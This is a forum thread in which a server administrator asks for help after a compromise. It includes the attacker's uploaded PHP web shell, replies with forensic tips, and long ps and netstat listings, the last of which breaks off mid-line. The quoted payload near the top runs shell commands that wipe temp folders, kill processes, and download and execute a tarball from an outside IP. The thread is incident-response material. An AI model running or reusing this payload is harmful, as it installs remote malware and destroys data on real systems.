HELP! Attack!

Hello,

One of my servers has recently been successfully attacked by a ukrain IP.
Through a website (which has been removed in the meantime) they managed to upload a malicious php code:

<?php system("cd /tmp ; cd /var/tmp ; rm -rf * ; killall -9 pscan scan bash dns-pool ssh2; curl -O http://81.93.193.221/b5.tar ; fetch http://81.93.193.221/b5.tar ; lwp-download http://81.93.193.221/b5.tar ; wget http://81.93.193.221/b5.tar ; tar xvf b5.tar ; tar zxvf b5.tar ; cd b5 ; chmod +x * ; nohup ./dns-pool &>/dev/null& "); shell_exec("cd /tmp ; cd /var/tmp ; rm -rf * ; killall -9 pscan scan bash dns-pool ssh2; curl -O http://81.93.193.221/b5.tar ; fetch http://81.93.193.221/b5.tar ; lwp-download http://81.93.193.221/b5.tar ; wget http://81.93.193.221/b5.tar ; tar xvf b5.tar ; tar zxvf b5.tar ; cd b5 ; chmod +x * ; nohup ./dns-pool &>/dev/null& "); exec("cd /tmp ; cd /var/tmp ; rm -rf * ; killall -9 pscan scan bash dns-pool ssh2; curl -O http://81.93.193.221/b5.tar ; fetch http://81.93.193.221/b5.tar ; lwp-download http://81.93.193.221/b5.tar ; wget http://81.93.193.221/b5.tar ; tar xvf b5.tar ; tar zxvf b5.tar ; cd b5 ; chmod +x * ; nohup ./dns-pool &>/dev/null& "); passthru("cd /tmp ; cd /var/tmp ; rm -rf * ; killall -9 pscan scan bash dns-pool ssh2; curl -O http://81.93.193.221/b5.tar ; fetch http://81.93.193.221/b5.tar ; lwp-download http://81.93.193.221/b5.tar ; wget http://81.93.193.221/b5.tar ; tar xvf b5.tar ; tar zxvf b5.tar ; cd b5 ; chmod +x * ; nohup ./dns-pool &>/dev/null& "); ?> This has been spotted by Maldetect, but too late. The executable has been run and files have been downloaded to the server. Since then I regularly have to reboot the server to keep the websites online. Something, somewhere is killing what I suspect the DNS server.

Help!

  • How can I see from where access is gained to the server?
  • How can I stop services being stopped?
  • The files in the tmp folders I found have been deleted.

I have ran a, quite aggressive, scan of maldetect after the issue has been discovered, but only false positives have been detected and quarantined.

Thanks!

--------EDIT---------
Should I reinstall some packages? (ssh2, dns?)
If so, how? If not, should I reinstall the server? Should I make a full backup? Won’t that include the malicious code?

Some tips i do when my servers to find malicous code:

  • is there a php script or other called from theses ip: grep POST /var/log/apache2/access_log or grep THE_IP /var/log/apache2/access_log
  • get the files in my webdirectories that have been modified since last day (or more): theses can be corrupted by the attack: find /var/www -mtime -1 -type f
  • what are the services are running on your server ? ps aux , find the pid, and check your /proc/$pid/ content
  • you can also see the connections made to your server: netstat -n

Good luck !

Guillaume

Dear Guillaume,

Thanks very much for your response.
Looking for POST in my logfiles did not yield anything.
I have searched for the last 10000 changed files when I discovered the intrusion and found that all files have been quarentined.
ps aux yields the following. However, I am not sure about this. Do you see anything suspicious?

[]# ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 19232 1524 ? Ss 08:42 0:00 /sbin/init
root 2 0.0 0.0 0 0 ? S 08:42 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S 08:42 0:00 [migration/0]
root 4 0.0 0.0 0 0 ? S 08:42 0:00 [ksoftirqd/0]
root 5 0.0 0.0 0 0 ? S 08:42 0:00 [migration/0]
root 6 0.0 0.0 0 0 ? S 08:42 0:00 [watchdog/0]
root 7 0.0 0.0 0 0 ? S 08:42 0:00 [migration/1]
root 8 0.0 0.0 0 0 ? S 08:42 0:00 [migration/1]
root 9 0.0 0.0 0 0 ? S 08:42 0:00 [ksoftirqd/1]
root 10 0.0 0.0 0 0 ? S 08:42 0:00 [watchdog/1]
root 11 0.0 0.0 0 0 ? S 08:42 0:00 [migration/2]
root 12 0.0 0.0 0 0 ? S 08:42 0:00 [migration/2]
root 13 0.0 0.0 0 0 ? S 08:42 0:00 [ksoftirqd/2]
root 14 0.0 0.0 0 0 ? S 08:42 0:00 [watchdog/2]
root 15 0.0 0.0 0 0 ? S 08:42 0:00 [migration/3]
root 16 0.0 0.0 0 0 ? S 08:42 0:00 [migration/3]
root 17 0.0 0.0 0 0 ? S 08:42 0:00 [ksoftirqd/3]
root 18 0.0 0.0 0 0 ? S 08:42 0:00 [watchdog/3]
root 19 0.0 0.0 0 0 ? S 08:42 0:00 [migration/4]
root 20 0.0 0.0 0 0 ? S 08:42 0:00 [migration/4]
root 21 0.0 0.0 0 0 ? S 08:42 0:00 [ksoftirqd/4]
root 22 0.0 0.0 0 0 ? S 08:42 0:00 [watchdog/4]
root 23 0.0 0.0 0 0 ? S 08:42 0:00 [migration/5]
root 24 0.0 0.0 0 0 ? S 08:42 0:00 [migration/5]
root 25 0.0 0.0 0 0 ? S 08:42 0:00 [ksoftirqd/5]
root 26 0.0 0.0 0 0 ? S 08:42 0:00 [watchdog/5]
root 27 0.0 0.0 0 0 ? S 08:42 0:00 [migration/6]
root 28 0.0 0.0 0 0 ? S 08:42 0:00 [migration/6]
root 29 0.0 0.0 0 0 ? S 08:42 0:00 [ksoftirqd/6]
root 30 0.0 0.0 0 0 ? S 08:42 0:00 [watchdog/6]
root 31 0.0 0.0 0 0 ? S 08:42 0:00 [migration/7]
root 32 0.0 0.0 0 0 ? S 08:42 0:00 [migration/7]
root 33 0.0 0.0 0 0 ? S 08:42 0:00 [ksoftirqd/7]
root 34 0.0 0.0 0 0 ? S 08:42 0:00 [watchdog/7]
root 35 0.0 0.0 0 0 ? S 08:42 0:00 [events/0]
root 36 0.0 0.0 0 0 ? S 08:42 0:00 [events/1]
root 37 0.0 0.0 0 0 ? S 08:42 0:00 [events/2]
root 38 0.0 0.0 0 0 ? S 08:42 0:00 [events/3]
root 39 0.0 0.0 0 0 ? S 08:42 0:00 [events/4]
root 40 0.0 0.0 0 0 ? S 08:42 0:00 [events/5]
root 41 0.0 0.0 0 0 ? S 08:42 0:00 [events/6]
root 42 0.0 0.0 0 0 ? S 08:42 0:00 [events/7]
root 43 0.0 0.0 0 0 ? S 08:42 0:00 [cgroup]
root 44 0.0 0.0 0 0 ? S 08:42 0:00 [khelper]
root 45 0.0 0.0 0 0 ? S 08:42 0:00 [netns]
root 46 0.0 0.0 0 0 ? S 08:42 0:00 [async/mgr]
root 47 0.0 0.0 0 0 ? S 08:42 0:00 [pm]
root 48 0.0 0.0 0 0 ? S 08:42 0:00 [sync_supers]
root 49 0.0 0.0 0 0 ? S 08:42 0:00 [bdi-default]
root 50 0.0 0.0 0 0 ? S 08:42 0:00 [kintegrityd/0]
root 51 0.0 0.0 0 0 ? S 08:42 0:00 [kintegrityd/1]
root 52 0.0 0.0 0 0 ? S 08:42 0:00 [kintegrityd/2]
root 53 0.0 0.0 0 0 ? S 08:42 0:00 [kintegrityd/3]
root 54 0.0 0.0 0 0 ? S 08:42 0:00 [kintegrityd/4]
root 55 0.0 0.0 0 0 ? S 08:42 0:00 [kintegrityd/5]
root 56 0.0 0.0 0 0 ? S 08:42 0:00 [kintegrityd/6]
root 57 0.0 0.0 0 0 ? S 08:42 0:00 [kintegrityd/7]
root 58 0.0 0.0 0 0 ? S 08:42 0:02 [kblockd/0]
root 59 0.0 0.0 0 0 ? S 08:42 0:00 [kblockd/1]
root 60 0.0 0.0 0 0 ? S 08:42 0:00 [kblockd/2]
root 61 0.0 0.0 0 0 ? S 08:42 0:00 [kblockd/3]
root 62 0.0 0.0 0 0 ? S 08:42 0:00 [kblockd/4]
root 63 0.0 0.0 0 0 ? S 08:42 0:00 [kblockd/5]
root 64 0.0 0.0 0 0 ? S 08:42 0:00 [kblockd/6]
root 65 0.0 0.0 0 0 ? S 08:42 0:00 [kblockd/7]
root 66 0.0 0.0 0 0 ? S 08:42 0:00 [kacpid]
root 67 0.0 0.0 0 0 ? S 08:42 0:00 [kacpi_notify]
root 68 0.0 0.0 0 0 ? S 08:42 0:00 [kacpi_hotplug]
root 69 0.0 0.0 0 0 ? S 08:42 0:00 [ata_aux]
root 70 0.0 0.0 0 0 ? S 08:42 0:00 [ata_sff/0]
root 71 0.0 0.0 0 0 ? S 08:42 0:00 [ata_sff/1]
root 72 0.0 0.0 0 0 ? S 08:42 0:00 [ata_sff/2]
root 73 0.0 0.0 0 0 ? S 08:42 0:00 [ata_sff/3]
root 74 0.0 0.0 0 0 ? S 08:42 0:00 [ata_sff/4]
root 75 0.0 0.0 0 0 ? S 08:42 0:00 [ata_sff/5]
root 76 0.0 0.0 0 0 ? S 08:42 0:00 [ata_sff/6]
root 77 0.0 0.0 0 0 ? S 08:42 0:00 [ata_sff/7]
root 78 0.0 0.0 0 0 ? S 08:42 0:00 [ksuspend_usbd]
root 79 0.0 0.0 0 0 ? S 08:42 0:00 [khubd]
root 80 0.0 0.0 0 0 ? S 08:42 0:00 [kseriod]
root 81 0.0 0.0 0 0 ? S 08:42 0:00 [md/0]
root 82 0.0 0.0 0 0 ? S 08:42 0:00 [md/1]
root 83 0.0 0.0 0 0 ? S 08:42 0:00 [md/2]
root 84 0.0 0.0 0 0 ? S 08:42 0:00 [md/3]
root 85 0.0 0.0 0 0 ? S 08:42 0:00 [md/4]
root 86 0.0 0.0 0 0 ? S 08:42 0:00 [md/5]
root 87 0.0 0.0 0 0 ? S 08:42 0:00 [md/6]
root 88 0.0 0.0 0 0 ? S 08:42 0:00 [md/7]
root 89 0.0 0.0 0 0 ? S 08:42 0:00 [md_misc/0]
root 90 0.0 0.0 0 0 ? S 08:42 0:00 [md_misc/1]
root 91 0.0 0.0 0 0 ? S 08:42 0:00 [md_misc/2]
root 92 0.0 0.0 0 0 ? S 08:42 0:00 [md_misc/3]
root 93 0.0 0.0 0 0 ? S 08:42 0:00 [md_misc/4]
root 94 0.0 0.0 0 0 ? S 08:42 0:00 [md_misc/5]
root 95 0.0 0.0 0 0 ? S 08:42 0:00 [md_misc/6]
root 96 0.0 0.0 0 0 ? S 08:42 0:00 [md_misc/7]
root 97 0.0 0.0 0 0 ? S 08:42 0:00 [linkwatch]
root 98 0.0 0.0 0 0 ? S 08:42 0:00 [khungtaskd]
root 99 0.0 0.0 0 0 ? S 08:42 0:00 [kswapd0]
root 100 0.0 0.0 0 0 ? SN 08:42 0:00 [ksmd]
root 101 0.0 0.0 0 0 ? SN 08:42 0:00 [khugepaged]
root 102 0.0 0.0 0 0 ? S 08:42 0:00 [aio/0]
root 103 0.0 0.0 0 0 ? S 08:42 0:00 [aio/1]
root 104 0.0 0.0 0 0 ? S 08:42 0:00 [aio/2]
root 105 0.0 0.0 0 0 ? S 08:42 0:00 [aio/3]
root 106 0.0 0.0 0 0 ? S 08:42 0:00 [aio/4]
root 107 0.0 0.0 0 0 ? S 08:42 0:00 [aio/5]
root 108 0.0 0.0 0 0 ? S 08:42 0:00 [aio/6]
root 109 0.0 0.0 0 0 ? S 08:42 0:00 [aio/7]
root 110 0.0 0.0 0 0 ? S 08:42 0:00 [crypto/0]
root 111 0.0 0.0 0 0 ? S 08:42 0:00 [crypto/1]
root 112 0.0 0.0 0 0 ? S 08:42 0:00 [crypto/2]
root 113 0.0 0.0 0 0 ? S 08:42 0:00 [crypto/3]
root 114 0.0 0.0 0 0 ? S 08:42 0:00 [crypto/4]
root 115 0.0 0.0 0 0 ? S 08:42 0:00 [crypto/5]
root 116 0.0 0.0 0 0 ? S 08:42 0:00 [crypto/6]
root 117 0.0 0.0 0 0 ? S 08:42 0:00 [crypto/7]
root 122 0.0 0.0 0 0 ? S 08:42 0:00 [kthrotld/0]
root 123 0.0 0.0 0 0 ? S 08:42 0:00 [kthrotld/1]
root 124 0.0 0.0 0 0 ? S 08:42 0:00 [kthrotld/2]
root 125 0.0 0.0 0 0 ? S 08:42 0:00 [kthrotld/3]
root 126 0.0 0.0 0 0 ? S 08:42 0:00 [kthrotld/4]
root 127 0.0 0.0 0 0 ? S 08:42 0:00 [kthrotld/5]
root 128 0.0 0.0 0 0 ? S 08:42 0:00 [kthrotld/6]
root 129 0.0 0.0 0 0 ? S 08:42 0:00 [kthrotld/7]
root 131 0.0 0.0 0 0 ? S 08:42 0:00 [kpsmoused]
root 132 0.0 0.0 0 0 ? S 08:42 0:00 [usbhid_resumer]
root 162 0.0 0.0 0 0 ? S 08:42 0:00 [kstriped]
root 336 0.0 0.0 0 0 ? S 08:42 0:00 [scsi_eh_0]
root 337 0.0 0.0 0 0 ? S 08:42 0:00 [scsi_eh_1]
root 338 0.0 0.0 0 0 ? S 08:42 0:00 [scsi_eh_2]
root 339 0.0 0.0 0 0 ? S 08:42 0:00 [scsi_eh_3]
root 340 0.0 0.0 0 0 ? S 08:42 0:00 [scsi_eh_4]
root 341 0.0 0.0 0 0 ? S 08:42 0:00 [scsi_eh_5]
root 480 0.0 0.0 0 0 ? S 08:42 0:00 [md1_raid1]
root 485 0.0 0.0 0 0 ? S 08:42 0:05 [md2_raid1]
root 491 0.0 0.0 0 0 ? S 08:42 0:00 [md0_raid1]
root 517 0.0 0.0 0 0 ? S 08:42 0:01 [jbd2/md2-8]
root 518 0.0 0.0 0 0 ? S 08:42 0:00 [ext4-dio-unwrit]
root 595 0.0 0.0 10648 736 ? S<s 08:42 0:00 /sbin/udevd -d
root 943 0.0 0.0 0 0 ? S 08:42 0:01 [kondemand/0]
root 944 0.0 0.0 0 0 ? S 08:42 0:00 [kondemand/1]
root 945 0.0 0.0 0 0 ? S 08:42 0:00 [kondemand/2]
root 946 0.0 0.0 0 0 ? S 08:42 0:00 [kondemand/3]
root 947 0.0 0.0 0 0 ? S 08:42 0:00 [kondemand/4]
root 948 0.0 0.0 0 0 ? S 08:42 0:00 [kondemand/5]
root 949 0.0 0.0 0 0 ? S 08:42 0:00 [kondemand/6]
root 950 0.0 0.0 0 0 ? S 08:42 0:00 [kondemand/7]
root 986 0.0 0.0 0 0 ? S 08:42 0:03 [flush-9:2]
root 987 0.0 0.0 0 0 ? S 08:42 0:00 [kjournald]
root 1058 0.0 0.0 0 0 ? S 08:42 0:00 [kauditd]
root 1300 0.0 0.0 27664 856 ? S<sl 08:42 0:00 auditd
root 1325 0.0 0.0 249084 1704 ? Sl 08:42 0:00 /sbin/rsyslogd -i /var/run/syslogd.pid -c 5
named 1339 0.0 0.0 702716 27460 ? Ssl 08:42 0:00 /usr/sbin/named -u named
dbus 1366 0.0 0.0 21404 872 ? Ss 08:42 0:00 dbus-daemon --system
root 1396 0.0 0.0 4080 636 ? Ss 08:42 0:00 /usr/sbin/acpid
root 1430 0.0 0.0 66608 1176 ? Ss 08:42 0:00 /usr/sbin/sshd
clam 1439 0.0 0.8 443804 273360 ? Ssl 08:42 0:06 clamd
root 1475 0.0 0.0 108168 1572 ? S 08:42 0:00 /bin/sh /usr/bin/mysqld_safe --datadir=/var/lib/mysql --socket=/var/lib/mysql/mysql.sock --pid-file=/var/run/mysqld/mysqld.pid --basedir=/u
mysql 1613 0.0 0.4 1058148 139068 ? Sl 08:42 0:06 /usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --log-error=/var/log/mysqld.log --pid-file=/var/run/mysqld/mysqld.
postgres 1656 0.0 0.0 207872 6180 ? S 08:42 0:00 /usr/bin/postmaster -p 5432 -D /var/lib/pgsql/data
postgres 1658 0.0 0.0 179284 1500 ? Ss 08:42 0:00 postgres: logger process
postgres 1660 0.0 0.0 207872 1900 ? Ss 08:42 0:00 postgres: writer process
postgres 1661 0.0 0.0 207872 1684 ? Ss 08:42 0:00 postgres: wal writer process
postgres 1662 0.0 0.0 208444 2340 ? Ss 08:42 0:01 postgres: autovacuum launcher process
postgres 1663 0.0 0.0 179832 2024 ? Ss 08:42 0:02 postgres: stats collector process
root 1673 0.0 0.0 19264 780 ? Ss 08:42 0:00 /usr/sbin/dovecot
dovecot 1674 0.0 0.0 12984 1072 ? S 08:42 0:00 dovecot/anvil
root 1676 0.0 0.0 13112 1184 ? S 08:42 0:00 dovecot/log
root 1685 0.0 0.0 68904 1688 ? Ss 08:42 0:00 /usr/sbin/saslauthd -m /var/run/saslauthd -a pam -r
root 1686 0.0 0.0 68904 1708 ? S 08:42 0:00 /usr/sbin/saslauthd -m /var/run/saslauthd -a pam -r
root 1687 0.0 0.0 68904 1700 ? S 08:42 0:00 /usr/sbin/saslauthd -m /var/run/saslauthd -a pam -r
root 1688 0.0 0.0 68904 1708 ? S 08:42 0:00 /usr/sbin/saslauthd -m /var/run/saslauthd -a pam -r
root 1689 0.0 0.0 68904 1708 ? S 08:42 0:00 /usr/sbin/saslauthd -m /var/run/saslauthd -a pam -r
root 1699 0.0 0.1 241244 51168 ? Ss 08:42 0:01 /usr/bin/spamd -d -c -m5 -H -r /var/run/spamd.pid
root 1700 0.0 0.1 254732 64756 ? S 08:42 0:07 spamd child
root 1701 0.0 0.1 241244 48632 ? S 08:42 0:00 spamd child
root 1777 0.0 0.0 81284 3388 ? Ss 08:42 0:00 /usr/libexec/postfix/master
postfix 1786 0.0 0.0 81540 3504 ? S 08:42 0:00 qmgr -l -t fifo -u
nobody 1787 0.0 0.0 150440 2020 ? Ss 08:42 0:00 proftpd: (accepting connections)
root 1795 0.0 0.0 463868 21880 ? Ss 08:42 0:00 /usr/sbin/httpd
apache 1801 0.0 0.0 249436 5620 ? S 08:42 0:00 /usr/sbin/httpd
root 1804 0.0 0.0 117324 1312 ? Ss 08:42 0:00 crond
root 1813 0.1 0.0 1035272 14120 ? Sl 08:42 0:17 /usr/bin/python /usr/bin/fail2ban-server -b -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ban/fail2ban.pid -x
root 1847 0.0 0.0 21540 480 ? Ss 08:42 0:00 /usr/sbin/atd
apache 1887 0.0 0.0 464700 13200 ? S 08:42 0:00 /usr/sbin/httpd
apache 1888 0.0 0.0 464828 13312 ? S 08:42 0:00 /usr/sbin/httpd
apache 1889 0.0 0.0 464768 13224 ? S 08:42 0:00 /usr/sbin/httpd
apache 1890 0.0 0.0 464712 12984 ? S 08:42 0:00 /usr/sbin/httpd
apache 1891 0.0 0.0 464700 13216 ? S 08:42 0:00 /usr/sbin/httpd
apache 1892 0.0 0.0 464724 13256 ? S 08:42 0:00 /usr/sbin/httpd
apache 1893 0.0 0.0 464456 13096 ? S 08:42 0:00 /usr/sbin/httpd
apache 1894 0.0 0.0 464700 13208 ? S 08:42 0:00 /usr/sbin/httpd
519 1895 0.0 0.1 423844 49580 ? S 08:42 0:03 /usr/bin/php-cgi
mailman 1901 0.0 0.0 203976 8724 ? Ss 08:42 0:00 /usr/bin/python /usr/lib/mailman/bin/mailmanctl -s -q start
509 1922 0.2 0.0 396452 29164 ? S 08:42 0:22 /usr/bin/php-cgi
mailman 1923 0.0 0.0 206188 11564 ? S 08:42 0:00 /usr/bin/python /usr/lib/mailman/bin/qrunner --runner=ArchRunner:0:1 -s
mailman 1924 0.0 0.0 206240 11636 ? S 08:42 0:01 /usr/bin/python /usr/lib/mailman/bin/qrunner --runner=BounceRunner:0:1 -s
mailman 1925 0.0 0.0 206184 11728 ? S 08:42 0:00 /usr/bin/python /usr/lib/mailman/bin/qrunner --runner=CommandRunner:0:1 -s
mailman 1926 0.0 0.0 206216 11636 ? S 08:42 0:01 /usr/bin/python /usr/lib/mailman/bin/qrunner --runner=IncomingRunner:0:1 -s
mailman 1927 0.0 0.0 206176 11636 ? S 08:42 0:00 /usr/bin/python /usr/lib/mailman/bin/qrunner --runner=NewsRunner:0:1 -s
mailman 1928 0.0 0.0 206220 11696 ? S 08:42 0:01 /usr/bin/python /usr/lib/mailman/bin/qrunner --runner=OutgoingRunner:0:1 -s
mailman 1929 0.0 0.0 206268 11576 ? S 08:42 0:00 /usr/bin/python /usr/lib/mailman/bin/qrunner --runner=VirginRunner:0:1 -s
mailman 1930 0.0 0.0 206184 11568 ? S 08:42 0:00 /usr/bin/python /usr/lib/mailman/bin/qrunner --runner=RetryRunner:0:1 -s
root 1932 0.0 0.1 185924 52472 ? Ss 08:42 0:00 /usr/libexec/webmin/virtual-server/lookup-domain-daemon.pl
root 1943 0.0 0.0 87572 16580 ? Ss 08:42 0:00 /usr/bin/perl /usr/libexec/usermin/miniserv.pl /etc/usermin/miniserv.conf
519 1956 0.0 0.1 421404 49072 ? S 08:42 0:01 /usr/bin/php-cgi
root 1957 0.0 0.0 88076 17436 ? Ss 08:42 0:00 /usr/bin/perl /usr/libexec/webmin/miniserv.pl /etc/webmin/miniserv.conf
root 1965 0.0 0.0 4064 576 tty1 Ss+ 08:42 0:00 /sbin/mingetty /dev/tty1
root 1967 0.0 0.0 4064 580 tty2 Ss+ 08:42 0:00 /sbin/mingetty /dev/tty2
root 1969 0.0 0.0 4064 580 tty3 Ss+ 08:42 0:00 /sbin/mingetty /dev/tty3
root 1971 0.0 0.0 4064 580 tty4 Ss+ 08:42 0:00 /sbin/mingetty /dev/tty4
root 1973 0.0 0.0 4064 572 tty5 Ss+ 08:42 0:00 /sbin/mingetty /dev/tty5
root 1975 0.0 0.0 4064 580 tty6 Ss+ 08:42 0:00 /sbin/mingetty /dev/tty6
root 1979 0.0 0.0 10968 1060 ? S< 08:42 0:00 /sbin/udevd -d
user1 1982 0.0 0.1 303680 32788 ? S 08:42 0:01 /usr/bin/php-cgi
root 2071 0.0 0.0 100372 4208 ? Ss 08:44 0:00 sshd: remi [priv]
user2 2074 0.1 0.1 322696 52188 ? S 08:44 0:14 /usr/bin/php-cgi
remi 2077 0.0 0.0 100372 2132 ? S 08:44 0:00 sshd: remi@pts/0
remi 2078 0.0 0.0 108304 1880 pts/0 Ss 08:44 0:00 -bash
root 2097 0.0 0.0 145436 1712 pts/0 S 08:44 0:00 su
root 2098 0.0 0.0 108436 2016 pts/0 S+ 08:44 0:00 bash
apache 2114 0.0 0.0 464700 13208 ? S 08:44 0:00 /usr/sbin/httpd
gswp 2414 0.0 0.1 309532 43056 ? S 08:48 0:00 /usr/bin/php-cgi
gswp 2415 0.0 0.1 323128 51852 ? S 08:48 0:00 /usr/bin/php-cgi
postfix 2435 0.0 0.0 81360 3396 ? S 08:49 0:00 tlsmgr -l -t unix -u
apache 3248 0.0 0.0 464752 13212 ? S 08:59 0:00 /usr/sbin/httpd
534 4917 0.0 0.0 400268 32660 ? S 09:01 0:00 /usr/bin/php-cgi
root 5437 0.0 0.0 100368 4092 ? Ss 09:05 0:00 sshd: remi [priv]
remi 5443 0.0 0.0 100368 2052 ? S 09:05 0:00 sshd: remi@pts/1
remi 5444 0.0 0.0 108304 1880 pts/1 Ss 09:05 0:00 -bash
root 5464 0.0 0.0 145436 1712 pts/1 S 09:05 0:00 su
root 5468 0.0 0.0 108436 2064 pts/1 S 09:05 0:00 bash
user 18064 0.2 0.1 330260 54636 ? S 09:31 0:16 /usr/bin/php-cgi
534 8167 0.0 0.1 419884 45680 ? S 09:35 0:00 /usr/bin/php-cgi
dovecot 8578 0.0 0.0 76612 2940 ? S 09:40 0:00 dovecot/auth
509 10465 0.1 0.0 395048 27932 ? S 10:00 0:08 /usr/bin/php-cgi
apache 11721 0.0 0.0 464816 13212 ? S 10:12 0:00 /usr/sbin/httpd
postfix 12305 0.0 0.0 81364 3364 ? S 10:17 0:00 pickup -l -t fifo -u
user 2 12308 0.0 0.1 323328 47700 ? S 10:17 0:00 /usr/bin/php-cgi
root 15057 0.0 0.0 15088 3204 ? S 10:40 0:00 dovecot/config
root 15348 0.0 0.0 10644 720 ? S< 10:43 0:00 /sbin/udevd -d
root 15349 0.0 0.0 0 0 ? S 10:43 0:00 [bluetooth]
root 16135 0.0 0.0 76760 3264 ? S 10:51 0:00 dovecot/auth -w
postfix 18114 0.0 0.0 99872 6624 ? S 11:16 0:00 smtpd -n smtp -t inet -u -o stress= -o smtpd_sasl_auth_enable=yes
postfix 18116 0.0 0.0 81356 3312 ? S 11:16 0:00 anvil -l -t unix -u
postfix 18118 0.0 0.0 82040 4300 ? S 11:16 0:00 cleanup -z -t unix -u
postfix 18119 0.0 0.0 81664 4080 ? S 11:16 0:00 local -t unix
postfix 18141 0.0 0.0 81568 3664 ? S 11:16 0:00 smtp -t unix -u
root 18255 0.0 0.0 110228 1176 pts/1 R+ 11:18 0:00 ps aux

The useraccount attached to the hacked site does not appear in this list.
I am afraid that the b5.tar file that was downloaded contains executables that are placed in the server and provide back ports.

netstat -l yields the following result:

netstat -l Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 *:submission *:* LISTEN tcp 0 0 *:pop3 *:* LISTEN tcp 0 0 localhost:dyna-access *:* LISTEN tcp 0 0 localhost:783 *:* LISTEN tcp 0 0 *:imap *:* LISTEN tcp 0 0 *:x11 *:* LISTEN tcp 0 0 *:urd *:* LISTEN tcp 0 0 *:20050 *:* LISTEN tcp 0 0 *:20051 *:* LISTEN tcp 0 0 static.253.54.251.14:domain *:* LISTEN tcp 0 0 static.252.54.251.14:domain *:* LISTEN tcp 0 0 exalt1.remisan.be:domain *:* LISTEN tcp 0 0 localhost:domain *:* LISTEN tcp 0 0 localhost:irisa *:* LISTEN tcp 0 0 localhost:postgres *:* LISTEN tcp 0 0 *:smtp *:* LISTEN tcp 0 0 localhost:rndc *:* LISTEN tcp 0 0 *:imaps *:* LISTEN tcp 0 0 *:pop3s *:* LISTEN tcp 0 0 *:mysql *:* LISTEN tcp 0 0 *:pop3 *:* LISTEN tcp 0 0 *:imap *:* LISTEN tcp 0 0 *:http *:* LISTEN tcp 0 0 *:x11 *:* LISTEN tcp 0 0 *:ftp *:* LISTEN tcp 0 0 *:domain *:* LISTEN tcp 0 0 ip6-localhost:rndc *:* LISTEN tcp 0 0 *:20442 *:* LISTEN tcp 0 0 *:https *:* LISTEN tcp 0 0 *:imaps *:* LISTEN tcp 0 0 *:pop3s *:* LISTEN udp 0 0 *:ndmp *:* udp 0 0 static.253.54.251.148:domain *:* udp 0 0 static.252.54.251.148:domain *:* udp 0 0 host.domain:domain *:* udp 0 0 localhost:domain *:* udp 0 0 *:domain *:* Active UNIX domain sockets (only servers) Proto RefCnt Flags Type State I-Node Path unix 2 [ ACC ] STREAM LISTENING 5435045 /var/run/mod_fcgid/1801.10 unix 2 [ ACC ] STREAM LISTENING 5444765 /var/run/mod_fcgid/1801.11 unix 2 [ ACC ] STREAM LISTENING 15061 /var/run/mod_fcgid/1801.5 unix 2 [ ACC ] STREAM LISTENING 10783 /tmp/.s.PGSQL.5432 unix 2 [ ACC ] STREAM LISTENING 11231 private/tlsmgr unix 2 [ ACC ] STREAM LISTENING 11235 private/rewrite unix 2 [ ACC ] STREAM LISTENING 9537 /var/run/dbus/system_bus_socket unix 2 [ ACC ] STREAM LISTENING 9733 /var/run/clamav/clamd.sock unix 2 [ ACC ] STREAM LISTENING 11239 private/bounce unix 2 [ ACC ] STREAM LISTENING 7344 @/com/ubuntu/upstart unix 2 [ ACC ] STREAM LISTENING 12354 /var/run/mod_fcgid/1801.1 unix 2 [ ACC ] STREAM LISTENING 10870 /var/run/dovecot/anvil unix 2 [ ACC ] STREAM LISTENING 10872 /var/run/dovecot/anvil-auth-penalty unix 2 [ ACC ] STREAM LISTENING 11243 private/defer unix 2 [ ACC ] STREAM LISTENING 11247 private/trace unix 2 [ ACC ] STREAM LISTENING 11251 private/verify unix 2 [ ACC ] STREAM LISTENING 11255 public/flush unix 2 [ ACC ] STREAM LISTENING 11259 private/proxymap unix 2 [ ACC ] STREAM LISTENING 11263 private/proxywrite unix 2 [ ACC ] STREAM LISTENING 11267 private/smtp unix 2 [ ACC ] STREAM LISTENING 11271 private/relay unix 2 [ ACC ] STREAM LISTENING 11275 public/showq unix 2 [ ACC ] STREAM LISTENING 11279 private/error unix 2 [ ACC ] STREAM LISTENING 11324 /var/run/proftpd/proftpd.sock unix 2 [ ACC ] STREAM LISTENING 15090 /var/run/mod_fcgid/1801.6 unix 2 [ ACC ] STREAM LISTENING 5420365 /var/run/mod_fcgid/1801.8 unix 2 [ ACC ] STREAM LISTENING 10830 /var/run/dovecot/login/ssl-params unix 2 [ ACC ] STREAM LISTENING 12856 /var/run/mod_fcgid/1801.3 unix 2 [ ACC ] STREAM LISTENING 11283 private/retry unix 2 [ ACC ] STREAM LISTENING 11287 private/discard unix 2 [ ACC ] STREAM LISTENING 10832 /var/run/dovecot/login/pop3 unix 2 [ ACC ] STREAM LISTENING 11291 private/local unix 2 [ ACC ] STREAM LISTENING 11295 private/virtual unix 2 [ ACC ] STREAM LISTENING 28777 /var/run/mod_fcgid/1801.7 unix 2 [ ACC ] STREAM LISTENING 9617 /var/run/acpid.socket unix 2 [ ACC ] STREAM LISTENING 13314 /var/run/mod_fcgid/1801.4 unix 2 [ ACC ] STREAM LISTENING 11343 /var/run/proftpd/proftpd.sock unix 2 [ ACC ] STREAM LISTENING 11299 private/lmtp unix 2 [ ACC ] STREAM LISTENING 11303 private/anvil unix 2 [ ACC ] STREAM LISTENING 11307 private/scache unix 2 [ ACC ] STREAM LISTENING 10838 /var/run/dovecot/login/imap unix 2 [ ACC ] STREAM LISTENING 10844 /var/run/dovecot/doveadm-server unix 2 [ ACC ] STREAM LISTENING 10846 /var/run/dovecot/dns-client unix 2 [ ACC ] STREAM LISTENING 10848 /var/run/dovecot/login/dns-client unix 2 [ ACC ] STREAM LISTENING 10850 /var/run/dovecot/director-admin unix 2 [ ACC ] STREAM LISTENING 10852 /var/run/dovecot/director-userdb unix 2 [ ACC ] STREAM LISTENING 10942 /var/run/saslauthd/mux unix 2 [ ACC ] STREAM LISTENING 10854 /var/run/dovecot/dict unix 2 [ ACC ] STREAM LISTENING 11224 public/cleanup unix 2 [ ACC ] STREAM LISTENING 10856 /var/run/dovecot/config unix 2 [ ACC ] STREAM LISTENING 10858 /var/run/dovecot/login/login unix 2 [ ACC ] STREAM LISTENING 10860 /var/run/dovecot/auth-login unix 2 [ ACC ] STREAM LISTENING 10862 /var/run/dovecot/auth-client unix 2 [ ACC ] STREAM LISTENING 10864 